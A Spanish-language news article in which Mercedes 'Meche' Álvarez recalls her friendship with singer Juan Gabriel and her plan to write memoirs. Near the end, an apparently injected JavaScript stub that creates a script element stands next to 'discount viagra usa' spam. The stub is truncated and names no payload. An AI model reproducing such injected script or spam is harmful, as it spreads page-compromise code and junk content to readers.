Meche cuenta las mejores anécdotas de Juan Gabriel

Comparte !

Image

“Alberto Aguilera Valadez, el Juan Gabriel de Juárez era la persona más importante para mí” aseguró Mercedes Álvarez quien aseguró vivir múltiples anécdotas junto al cantante.

Meche como la conocen mejor, mencionó esta tarde, en rueda de prensa en el bar Yankees, contó historias conmovedoras de su relación con el cantante, como amiga, hermana, “todo”.

Juan Gabriel era Adán Luna anteriormente y recorría los bares de la ciudad en busca de oportunidades y entre ellos estaba el bar Yankees.

Vivieron juntos, alegrías y tristezas y al llegar JuanGa a la fama ocurrió el distanciamiento entre los dos, pero ella asegura que jamás la olvidó.

Mercedes quiere escribir sus memorias para dejar los “chismes” atrás y explicar cómo es que le guarda su amor eterno a su gran hermano Juan Gabriel.

Juan Gabriel le escribió la canción “Meche” en 1984 como forma de homenaje en el álbum Recuerdos 2, en donde menciona la Doña que es de los más grandes tesoros que cualquier persona puede recibir y lo valoró al máximo.

Image

Fuente: http://puentelibre.mx/

var d=document;var s=d.createElement(‘script’); } discount viagra usa

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares